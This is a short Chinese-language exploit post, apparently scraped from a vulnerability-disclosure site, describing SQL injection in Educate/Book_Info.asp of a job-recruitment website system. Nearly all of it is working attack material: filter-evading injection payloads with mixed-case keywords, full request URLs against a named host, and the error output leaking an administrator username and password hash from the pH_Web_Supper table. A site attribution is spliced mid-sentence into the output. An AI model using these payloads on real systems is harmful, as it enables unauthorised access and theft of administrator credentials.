漏洞出現在Educate/Book_Info.asp
此處注入點雖然過濾了一些關鍵字 但是我們還是可以盲注的 可以利用sqlmap跑出
exp:如下
查詢管理賬號:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查詢管理密碼:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'
將 nvarchar 值 'hackbase' 轉換為數據類型為 int 的列時發生語法錯誤,網絡求職招聘人才網站系統正式版漏洞漏洞預警,電腦資料《網絡求職招聘人才網站系統正式版漏洞漏洞預警》(https://www.unjs.com)。
/Educate/Book_Info.asp,行 8
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'
將 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 轉換為數據類型為 int 的列時發生語法錯誤。
/Educate/Book_Info.asp,行 8